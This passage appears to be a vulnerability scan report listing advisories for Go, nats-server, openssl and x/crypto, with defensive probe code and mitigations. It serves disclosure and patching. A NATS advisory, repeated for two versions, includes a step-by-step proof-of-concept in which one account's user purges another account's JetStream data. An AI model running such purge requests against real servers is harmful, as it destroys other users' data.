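A small probe of the bracket handling; fixed versions reject the non-IPv6 forms, and the exact error text varies by version:

```go
package main

import (
	"fmt"
	"net/url"
)

func main() {
	// Only IPv6 literals belong inside brackets; fixed versions reject
	// the other two forms.
	for _, s := range []string{"http://[::1]/", "http://[127.0.0.1]/", "http://[example.com]/"} {
		u, err := url.Parse(s)
		if err != nil {
			fmt.Printf("%s rejected: %v\n", s, err)
			continue
		}
		fmt.Printf("%s host=%s\n", s, u.Host)
	}
}
```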

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.11 | 1.20.11 | 0.040% | 12th percentile |
Description
On Windows, the IsLocal function does not correctly detect reserved device names in some cases.
Reserved names followed by spaces, such as "COM1 ", and reserved names "COM" and "LPT" followed by superscript 1, 2, or 3, are incorrectly reported as local.
With fix, IsLocal now correctly reports these names as non-local.
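A probe of the affected names (meaningful on Windows; filepath.IsLocal exists since Go 1.20, which the affected range implies is in use):

```go
package main

import (
	"fmt"
	"path/filepath"
)

func main() {
	// Reserved-device variants that vulnerable versions misreported as
	// local; meaningful on Windows (elsewhere these are ordinary names).
	for _, p := range []string{"COM1", "COM1 ", "COM¹", "LPT¹"} {
		fmt.Printf("IsLocal(%q) = %v\n", p, filepath.IsLocal(p))
	}
}
```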

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.20.12 | 1.20.12 | 0.048% | 15th percentile |
Description
A malicious HTTP sender can use chunk extensions to cause a receiver reading from a request or response body to read many more bytes from the network than are in the body.
A malicious HTTP client can further exploit this to cause a server to automatically read a large amount of data (up to about 1GiB) when a handler fails to read the entire body of a request.
Chunk extensions are a little-used HTTP feature which permit including additional metadata in a request or response body sent using the chunked encoding. The net/http chunked encoding reader discards this metadata. A sender can exploit this by inserting a large metadata segment with each byte transferred. The chunk reader now produces an error if the ratio of real body to encoded bytes grows too small.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.12 | 1.19.12 | 0.112% | 30th percentile |
Description
Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures.
With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits.
Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.19.7 | 1.19.7 | 0.024% | 6th percentile |
Description
The ScalarMult and ScalarBaseMult methods of the P256 Curve may return an incorrect result if called with some specific unreduced scalars (a scalar larger than the order of the curve).
This does not impact usages of crypto/ecdsa or crypto/ecdh.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| >=1.19.0-0 <1.19.4 | 1.19.4 | 0.541% | 67th percentile |
Description
An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests.
HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.24.8 | 1.24.8 | 0.014% | 2nd percentile |
Description
tar.Reader does not limit the number of sparse region data blocks in GNU tar pax 1.0 sparse files. A maliciously-crafted archive containing a large number of sparse regions can cause a Reader to read an unbounded amount of data from the archive into memory. When reading from a compressed source, a small compressed input can result in large allocations.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.22.7 | 1.22.7 | 0.073% | 22nd percentile |
Description
Calling any of the Parse functions on Go source code which contains deeply nested literals can cause a panic due to stack exhaustion.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.21.8 | 1.21.8 | 0.454% | 63rd percentile |
Description
When following an HTTP redirect to a domain which is not a subdomain match or exact match of the initial domain, an http.Client does not forward sensitive headers such as "Authorization" or "Cookie". For example, a redirect from foo.com to www.foo.com will forward the Authorization header, but a redirect to bar.com will not.
A maliciously crafted HTTP redirect could cause sensitive headers to be unexpectedly forwarded.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.22.12 | 1.22.12 | 0.017% | 3rd percentile |
Description
Due to the usage of a variable time instruction in the assembly implementation of an internal function, a small number of bits of secret scalars are leaked on the ppc64le architecture. Due to the way this function is used, we do not believe this leakage is enough to allow recovery of the private key when P-256 is used in any well known protocols.
github.com/nats-io/nats-server/v2 2.9.2 (golang)
pkg:golang/github.com/nats-io/nats-server@2.9.2#v2
Improper Authorization
| Affected range | Fixed version | CVSS Score | CVSS Vector | EPSS Score | EPSS Percentile |
|---|---|---|---|---|---|
| >=2.2.0 <2.10.27 | 2.10.27 | 9.6 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H | 0.053% | 17th percentile |
Description
Advisory
The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.
Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.
Affected versions
NATS Server:
- Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27
Original Report
(Lightly edited to confirm some supposition and in the summary to use past tense)
Summary
nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.
In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.
Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.
Reproduction of the ACCOUNT.PURGE case is below. The others are like it.
Details & Impact
Issue 1: $JS.API.ACCOUNT.PURGE.*
Any user may perform an account purge of any other account (including their own).
Risk: total destruction of Jetstream configuration and data.
Issue 2: $JS.API.SERVER.REMOVE
Any user may remove servers from Jetstream clusters.
Risk: Loss of data redundancy, reduction of service quality.
Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE
Any user may cause streams to be moved between servers.
Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.
Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*
Mitigations
It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.
Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.
Scope of impact
Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.
While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.
Additional notes
It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.
PoC
Environment
Tested with:
- nats-server 2.10.26 (installed via homebrew)
- nats cli 0.1.6 (installed via homebrew)
- macOS 13.7.4
Reproduction steps
```
$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS':  { users: [{user: 'sys', password: 'sys'}] },
  'TEST':  { jetstream: true, users: [{user: 'a', password: 'a'}] },
  'TEST2': { jetstream: true, users: [{user: 'b', password: 'b'}] }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
User: sys
Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
User: a
Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
User: b
Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg {{Count}}"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭─────────────────────────────────────────────────────────────────────────────────╮
│                                     Streams                                     │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B    tmp/jetstream/TEST/streams/stream1/obs
8.0K    tmp/jetstream/TEST/streams/stream1/msgs
 16K    tmp/jetstream/TEST/streams/stream1
 16K    tmp/jetstream/TEST/streams
 16K    tmp/jetstream/TEST
 16K    tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).
# According to the source comments, user b shouldn't even be able to purge
# its own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B    tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined
```
Authentication Bypass by Primary Weakness
| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| >=2.2.0 <2.9.23 | 2.9.23 | 0.212% | 44th percentile |
Description
Background
NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.
NATS users exist within accounts, and once using accounts, the old authorization block is not applicable.
Problem Description
Without any authorization rules in the nats-server, users can connect without authentication.
Before nats-server 2.2.0, all authentication and authorization rules for a nats-server lived in an "authorization" block, defining users. With nats-server 2.2.0 all users live inside accounts. When using the authorization block, whose syntax predates this, those users will be placed into the implicit global account, "$G". Users inside accounts go into the newer "accounts" block.
If an "accounts" block is defined, in simple deployment scenarios this is often used only to enable client access to the system account. When the only account added is the system account "$SYS", the nats-server would create an implicit user in "$G" and set it as the no_auth_user account, enabling the same "without authentication" logic as without any rules.
This preserved the ability to connect simply, and then add one authenticated login for system access.
But with an "authorization" block, this is wrong. Users exist in the global account, with login rules. And in simple testing, they might still connect fine without administrators seeing that authentication has been disabled.
The blind-spot on our part came from encouraging and documenting a switch to using only "accounts", instead of "authorization".
In the fixed versions, using an "authorization" block will inhibit the implicit creation of a "$G" user and setting it as the no_auth_user target. In unfixed versions, just creating a second account, with no users, will also inhibit this behavior.
Affected versions
NATS Server:
- 2.2.0 up to and including 2.9.22 and 2.10.1
- Fixed with nats-io/nats-server: 2.10.2 and backported to 2.9.23
Workarounds
In the "accounts" block, define a second non-system account, leave it empty.
accounts { SYS: { users: [ { user: sysuser, password: makemeasandwich } ] } DUMMY: {} # for security, before 2.10.2 } system_account: SYS
Solution
Any one of these:
- Upgrade the NATS server to at least 2.10.2 (or 2.9.23)
- Or define a dummy account
- Or complete the migration of authorization entries to be inside a named account in the "accounts" block
Credits
Problem reported by Alex Herrington.
Addressed publicly in a GitHub Discussion prior to this advisory.
github.com/nats-io/nats-server/v2 2.9.0 (golang)
pkg:golang/github.com/nats-io/nats-server@2.9.0#v2
Improper Authorization
| Affected range | Fixed version | CVSS Score | CVSS Vector | EPSS Score | EPSS Percentile |
|---|---|---|---|---|---|
| >=2.2.0 <2.10.27 | 2.10.27 | 9.6 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:H | 0.053% | 17th percentile |
Description
Advisory
The management of JetStream assets happens with messages in the $JS. subject namespace in the system account; this is partially exposed into regular accounts to allow account holders to manage their assets.
Some of the JS API requests were missing access controls, allowing any user with JS management permissions in any account to perform certain administrative actions on any JS asset in any other account. At least one of the unprotected APIs allows for data destruction. None of the affected APIs allow disclosing stream contents.
Affected versions
NATS Server:
- Version 2 from v2.2.0 onwards, prior to v2.11.1 or v2.10.27
Original Report
(Lightly edited to confirm some supposition and in the summary to use past tense)
Summary
nats-server did not include authorization checks on 4 separate admin-level JetStream APIs: account purge, server remove, account stream move, and account stream cancel-move.
In all cases, APIs are not properly restricted to system-account users. Instead, any authorized user can execute the APIs, including across account boundaries, as long as the current user merely has permission to publish on $JS.>.
Only the first seems to be of highest severity. All are included in this single report as they seem likely to have the same underlying root cause.
Reproduction of the ACCOUNT.PURGE case is below. The others are like it.
Details & Impact
Issue 1: $JS.API.ACCOUNT.PURGE.*
Any user may perform an account purge of any other account (including their own).
Risk: total destruction of Jetstream configuration and data.
Issue 2: $JS.API.SERVER.REMOVE
Any user may remove servers from Jetstream clusters.
Risk: Loss of data redundancy, reduction of service quality.
Issue 3: $JS.API.ACCOUNT.STREAM.MOVE.*.* and CANCEL_MOVE
Any user may cause streams to be moved between servers.
Risk: loss of control of data provenance, reduced service quality during move, enumeration of account and/or stream names.
Similarly for $JS.API.ACCOUNT.STREAM.CANCEL_MOVE.*.*
Mitigations
It appears that users without permission to publish on $JS.API.ACCOUNT.> or $JS.API.SERVER.> are unable to execute the above APIs.
Unfortunately, in many configurations, an 'admin' user for a single account will be given permissions for $JS.> (or simply >), which allows the improper access to the system APIs above.
Scope of impact
Issues 1 and 3 both cross boundaries between accounts, violating promised account isolation. All 3 allow system level access to non-system account users.
While I cannot speak to what authz configurations are actually found in the wild, per the discussion in Mitigations above, it seems likely that at least some configurations are vulnerable.
Additional notes
It appears that $JS.API.META.LEADER.STEPDOWN does properly restrict to system account users. As such, this may be a pattern for how to properly authorize these other APIs.
PoC
Environment
Tested with:
- nats-server 2.10.26 (installed via homebrew)
- nats cli 0.1.6 (installed via homebrew)
- macOS 13.7.4
Reproduction steps
```
$ nats-server --version
nats-server: v2.10.26

$ nats --version
0.1.6

$ cat nats-server.conf
listen: '0.0.0.0:4233'
jetstream: {
  store_dir: './tmp'
}
accounts: {
  '$SYS':  { users: [{user: 'sys', password: 'sys'}] },
  'TEST':  { jetstream: true, users: [{user: 'a', password: 'a'}] },
  'TEST2': { jetstream: true, users: [{user: 'b', password: 'b'}] }
}

$ nats-server -c ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.494663 [INF] Using configuration file: ./nats-server.conf
...
[90608] 2025/03/02 11:43:18.496395 [INF] Listening for client connections on 0.0.0.0:4233
...

# Authentication is effectively enabled by the server:
$ nats -s nats://localhost:4233 account info
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user sys --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user a --password wrong
nats: error: setup failed: nats: Authorization Violation

$ nats -s nats://localhost:4233 account info --user b --password wrong
nats: error: setup failed: nats: Authorization Violation

# Valid credentials work, and users properly matched to accounts:
$ nats -s nats://localhost:4233 account info --user sys --password sys
Account Information
User: sys
Account: $SYS
...

$ nats -s nats://localhost:4233 account info --user a --password a
Account Information
User: a
Account: TEST
...

$ nats -s nats://localhost:4233 account info --user b --password b
Account Information
User: b
Account: TEST2
...

# Add a stream and messages to account TEST (user 'a'):
$ nats -s nats://localhost:4233 --user a --password a stream add stream1 --subjects s1 --storage file --defaults
Stream stream1 was created
...

$ nats -s nats://localhost:4233 --user a --password a publish s1 --count 3 "msg {{Count}}"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"
11:50:05 Published 5 bytes to "s1"

# Messages are correctly persisted on account TEST, and not on TEST2:
$ nats -s nats://localhost:4233 --user a --password a stream ls
╭─────────────────────────────────────────────────────────────────────────────────╮
│                                     Streams                                     │
├─────────┬─────────────┬─────────────────────┬──────────┬───────┬──────────────┤
│ Name    │ Description │ Created             │ Messages │ Size  │ Last Message │
├─────────┼─────────────┼─────────────────────┼──────────┼───────┼──────────────┤
│ stream1 │             │ 2025-03-02 11:48:49 │ 3        │ 111 B │ 46.01s       │
╰─────────┴─────────────┴─────────────────────┴──────────┴───────┴──────────────╯

$ nats -s nats://localhost:4233 --user b --password b stream ls
No Streams defined

$ du -h tmp/jetstream
  0B    tmp/jetstream/TEST/streams/stream1/obs
8.0K    tmp/jetstream/TEST/streams/stream1/msgs
 16K    tmp/jetstream/TEST/streams/stream1
 16K    tmp/jetstream/TEST/streams
 16K    tmp/jetstream/TEST
 16K    tmp/jetstream

# User b (account TEST2) sends a PURGE command for account TEST (user a).
# According to the source comments, user b shouldn't even be able to purge
# its own account, much less another one.
$ nats -s nats://localhost:4233 --user b --password b request '$JS.API.ACCOUNT.PURGE.TEST' ''
11:54:50 Sending request on "$JS.API.ACCOUNT.PURGE.TEST"
11:54:50 Received with rtt 1.528042ms
{"type":"io.nats.jetstream.api.v1.account_purge_response","initiated":true}

# From nats-server in response to the purge request:
[90608] 2025/03/02 11:54:50.277144 [INF] Purge request for account TEST (streams: 1, hasAccount: true)

# And indeed, the stream data is gone on account TEST:
$ du -h tmp/jetstream
  0B    tmp/jetstream

$ nats -s nats://localhost:4233 --user a --password a stream ls
No Streams defined
```
Authentication Bypass by Primary Weakness
| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| >=2.2.0 <2.9.23 | 2.9.23 | 0.212% | 44th percentile |
Description
Background
NATS.io is a high performance open source pub-sub distributed communication technology, built for the cloud, on-premise, IoT, and edge computing.
NATS users exist within accounts, and once using accounts, the old authorization block is not applicable.
Problem Description
Without any authorization rules in the nats-server, users can connect without authentication.
Before nats-server 2.2.0, all authentication and authorization rules for a nats-server lived in an "authorization" block, defining users. With nats-server 2.2.0 all users live inside accounts. When using the authorization block, whose syntax predates this, those users will be placed into the implicit global account, "$G". Users inside accounts go into the newer "accounts" block.
If an "accounts" block is defined, in simple deployment scenarios this is often used only to enable client access to the system account. When the only account added is the system account "$SYS", the nats-server would create an implicit user in "$G" and set it as the no_auth_user account, enabling the same "without authentication" logic as without any rules.
This preserved the ability to connect simply, and then add one authenticated login for system access.
But with an "authorization" block, this is wrong. Users exist in the global account, with login rules. And in simple testing, they might still connect fine without administrators seeing that authentication has been disabled.
The blind-spot on our part came from encouraging and documenting a switch to using only "accounts", instead of "authorization".
In the fixed versions, using an "authorization" block will inhibit the implicit creation of a "$G" user and setting it as the no_auth_user target. In unfixed versions, just creating a second account, with no users, will also inhibit this behavior.
Affected versions
NATS Server:
- 2.2.0 up to and including 2.9.22 and 2.10.1
- Fixed with nats-io/nats-server: 2.10.2 and backported to 2.9.23
Workarounds
In the "accounts" block, define a second non-system account, leave it empty.
accounts { SYS: { users: [ { user: sysuser, password: makemeasandwich } ] } DUMMY: {} # for security, before 2.10.2 } system_account: SYS
Solution
Any one of these:
- Upgrade the NATS server to at least 2.10.2 (or 2.9.23)
- Or define a dummy account
- Or complete the migration of authorization entries to be inside a named account in the "accounts" block
Credits
Problem reported by Alex Herrington.
Addressed publicly in a GitHub Discussion prior to this advisory.
openssl 1.1.1q-r0 (apk)
pkg:apk/alpine/openssl@1.1.1q-r0?os_name=alpine&os_version=3.16

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1t-r1 | 1.1.1t-r1 | 0.857% | 74th percentile |
Description

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1t-r0 | 1.1.1t-r0 | 88.474% | 99th percentile |
Description
There is a type confusion vulnerability relating to X.400 address processing
inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but
the public structure definition for GENERAL_NAME incorrectly specified the type
of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by
the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an
ASN1_STRING.
When CRL checking is enabled (i.e. the application sets the
X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass
arbitrary pointers to a memcmp call, enabling them to read memory contents or
enact a denial of service. In most cases, the attack requires the attacker to
provide both the certificate chain and CRL, neither of which need to have a
valid signature. If the attacker only controls one of these inputs, the other
input must already contain an X.400 address as a CRL distribution point, which
is uncommon. As such, this vulnerability is most likely to only affect
applications which have implemented their own functionality for retrieving CRLs
over a network.
OpenSSL versions 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zg (premium support customers
only).
This issue was reported on 11th January 2023 by David Benjamin (Google).
The fix was developed by Hugo Landau.

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1u-r0 | 1.1.1u-r0 | 91.907% | 100th percentile |
Description

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1w-r1 | 1.1.1w-r1 | 0.638% | 70th percentile |
Description

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1v-r0 | 1.1.1v-r0 | 0.329% | 55th percentile |
Description

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1u-r2 | 1.1.1u-r2 | 0.976% | 76th percentile |
Description

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1t-r2 | 1.1.1t-r2 | 0.398% | 60th percentile |
Description

| Affected range | Fixed version | EPSS Score | EPSS Percentile |
|---|---|---|---|
| <1.1.1t-r0 | 1.1.1t-r0 | 0.545% | 67th percentile |
Description
The public API function BIO_new_NDEF is a helper function used for streaming
ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the
SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by
end user applications.
The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter
BIO onto the front of it to form a BIO chain, and then returns the new head of
the BIO chain to the caller. Under certain conditions, for example if a CMS
recipient public key is invalid, the new filter BIO is freed and the function
returns a NULL result indicating a failure. However, in this case, the BIO chain
is not properly cleaned up and the BIO passed by the caller still retains
internal pointers to the previously freed filter BIO. If the caller then goes on
to call BIO_pop() on the BIO then a use-after-free will occur. This will most
likely result in a crash.
This scenario occurs directly in the internal function B64_write_ASN1() which
may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on
the BIO. This internal function is in turn called by the public API functions
PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream,
SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7.
Other public API functions that may be impacted by this include
i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and
i2d_PKCS7_bio_stream.
The OpenSSL cms and smime command line applications are similarly affected.
OpenSSL 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zg (premium support customers
only).
This issue was reported on 29th November 2022 by Octavio Galland and
Marcel Böhme (Max Planck Institute for Security and Privacy). The fix was
developed by Viktor Dukhovni and Matt Caswell.

| Affected range | <1.1.1t-r0 | | Fixed version | 1.1.1t-r0 | | EPSS Score | 0.140% | | EPSS Percentile | 35th percentile |
Description
The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and
decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data.
If the function succeeds then the "name_out", "header" and "data" arguments are
populated with pointers to buffers containing the relevant decoded data. The
caller is responsible for freeing those buffers. It is possible to construct a
PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex()
will return a failure code but will populate the header argument with a pointer
to a buffer that has already been freed. If the caller also frees this buffer
then a double free will occur. This will most likely lead to a crash. This
could be exploited by an attacker who has the ability to supply malicious PEM
files for parsing to achieve a denial of service attack.
The functions PEM_read_bio() and PEM_read() are simple wrappers around
PEM_read_bio_ex() and therefore these functions are also directly affected.
These functions are also called indirectly by a number of other OpenSSL
functions including PEM_X509_INFO_read_bio_ex() and
SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal
uses of these functions are not vulnerable because the caller does not free the
header argument if PEM_read_bio_ex() returns a failure code. These locations
include the PEM_read_bio_TYPE() functions as well as the decoders introduced in
OpenSSL 3.0.
The OpenSSL asn1parse command line application is also impacted by this issue.
OpenSSL 3.0 and 1.1.1 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 is not affected by this issue.
This issue was discovered by CarpetFuzz and reported on 8th December 2022 by
Dawei Wang. The fix was developed by Kurt Roeckx and Matt Caswell.

| Affected range | <1.1.1t-r0 | | Fixed version | 1.1.1t-r0 | | EPSS Score | 0.255% | | EPSS Percentile | 49th percentile |
Description
A timing based side channel exists in the OpenSSL RSA Decryption implementation
which could be sufficient to recover a plaintext across a network in a
Bleichenbacher style attack. To achieve a successful decryption an attacker
would have to be able to send a very large number of trial messages for
decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5,
RSA-OAEP and RSASVE.
For example, in a TLS connection, RSA is commonly used by a client to send an
encrypted pre-master secret to the server. An attacker that had observed a
genuine connection between a client and a server could use this flaw to send
trial messages to the server and record the time taken to process them. After a
sufficiently large number of messages the attacker could recover the pre-master
secret used for the original connection and thus be able to decrypt the
application data sent over that connection.
OpenSSL 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.
OpenSSL 3.0 users should upgrade to OpenSSL 3.0.8.
OpenSSL 1.1.1 users should upgrade to OpenSSL 1.1.1t.
OpenSSL 1.0.2 users should upgrade to OpenSSL 1.0.2zg (premium support customers
only).
An initial report of a possible timing side channel was made on 14th July 2020
by Hubert Kario (Red Hat). A refined report identifying a specific timing side
channel was made on 15th July 2022 by Hubert Kario.
The fix was developed by Dmitry Belyavsky (Red Hat) and Hubert Kario.
|
golang.org/x/crypto 0.0.0-20220315160706-3147a52a75dd (golang)
pkg:golang/golang.org/x/crypto@0.0.0-20220315160706-3147a52a75dd

| Affected range | <0.0.0-20220525230936-793ad666bf5e | | Fixed version | 0.0.0-20220525230936-793ad666bf5e | | EPSS Score | 0.247% | | EPSS Percentile | 48th percentile |
Description
httpTokenCacheKey uses path.Base to extract the expected HTTP-01 token value to lookup in the DirCache implementation. On Windows, path.Base acts differently to filepath.Base, since Windows uses a different path separator (\ vs. /), allowing a user to provide a relative path, i.e. .well-known/acme-challenge/....\asd becomes ....\asd. The extracted path is then suffixed with +http-01, joined with the cache directory, and opened.
Because the controlled path is suffixed with +http-01 before opening, the impact is significantly limited: it only allows reading arbitrary files on the system if they happen to have this suffix.
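The Windows-only divergence between path.Base and filepath.Base is easy to demonstrate; a minimal sketch, with a hypothetical attacker-supplied path for illustration:

```go
package main

import (
	"fmt"
	"path"
	"path/filepath"
)

func main() {
	// Hypothetical attacker-supplied request path on a Windows host.
	p := `.well-known/acme-challenge/quux\..\asd`

	// path.Base treats only '/' as a separator, so the backslash
	// components survive and later reach the cache lookup.
	fmt.Println(path.Base(p)) // quux\..\asd

	// filepath.Base would also split on '\' on Windows; on Unix it
	// behaves like path.Base here.
	fmt.Println(filepath.Base(p))
}
```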
Insufficient Verification of Data Authenticity
| Affected range | <0.0.0-20231218163308-9d2ee975ef9f | | Fixed version | 0.0.0-20231218163308-9d2ee975ef9f | | CVSS Score | 5.9 | | CVSS Vector | CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N | | EPSS Score | 55.964% | | EPSS Percentile | 98th percentile |
Description
Summary
Terrapin is a prefix truncation attack targeting the SSH protocol. More precisely, Terrapin breaks the integrity of SSH's secure channel. By carefully adjusting the sequence numbers during the handshake, an attacker can remove an arbitrary number of messages sent by the client or server at the beginning of the secure channel without the client or server noticing it.
Mitigations
To mitigate this protocol vulnerability, OpenSSH suggested a so-called "strict kex", which alters the SSH handshake to ensure a Man-in-the-Middle attacker can neither introduce unauthenticated messages nor carry sequence number manipulation across handshakes.
Warning: To take effect, both the client and server must support this countermeasure.
As a stop-gap measure, peers may also (temporarily) disable the affected algorithms and use unaffected alternatives like AES-GCM instead until patches are available.
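For Go programs built on golang.org/x/crypto/ssh, that stop-gap can be expressed by pinning the negotiable algorithms. A hedged sketch (host, credentials, and the exact algorithm lists are illustrative assumptions, not a vetted policy):

```go
package main

import (
	"log"

	"golang.org/x/crypto/ssh"
)

func main() {
	cfg := &ssh.ClientConfig{
		User: "demo",                                   // illustrative
		Auth: []ssh.AuthMethod{ssh.Password("secret")}, // illustrative
		Config: ssh.Config{
			// Exclude chacha20-poly1305@openssh.com and CBC modes;
			// prefer AES-GCM and CTR as unaffected alternatives.
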